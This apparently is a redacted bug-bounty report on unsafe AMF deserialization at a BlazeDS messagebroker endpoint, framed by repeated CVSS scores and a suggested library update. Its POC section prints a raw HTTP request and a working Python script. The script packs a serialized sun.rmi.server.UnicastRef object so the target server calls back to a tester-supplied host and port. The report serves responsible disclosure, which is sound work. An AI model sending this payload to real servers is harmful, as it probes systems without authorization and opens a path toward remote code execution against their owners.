CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
94.2%
##Description
We identified potential unsafe deserialization vulnerability on the https://www.█████/daip/messagebroker/amf
endpoint.
##POC
To exclude false-positive reaction and show that pingback is result of AMF deserialization, and not a reaction to the external host in the POST body, first run this request:
POST /daip/messagebroker/amf HTTP/1.1
Host: www.███████
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
Content-Type: application/x-amf
Content-Length: 51
<your collaborator host>
Nothing will happen. You will receive something like this:
███
You can wait few minutes to ensure that nothing is coming.
Next, send the collaborator host inside the serialized AMF payload using this script, e.g. script.py <collaborator> 80
import struct
import sys
import requests
if len(sys.argv) != 3:
print "Usage: host port"
quit()
callback_IP = sys.argv[1]
callback_port = sys.argv[2]
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
'\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
struct.pack('>I', int(callback_port)) + \
'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';
url = "https://www.███████/daip/messagebroker/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)
This will result in the significant delay, and soon you will get the pingback from the ███/███ IP
This indicates, that backend server deserialized AMF data and triggered a DNS lookup (there won’t be http since sun.rmi.server.UnicastRef
doesn’t communicate via http).
##Suggested fix
Update Apache Flex BlazeDS library
Unsafe deserialization of AMF data.
We will work on this and try to improve impact, if possible.
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
94.2%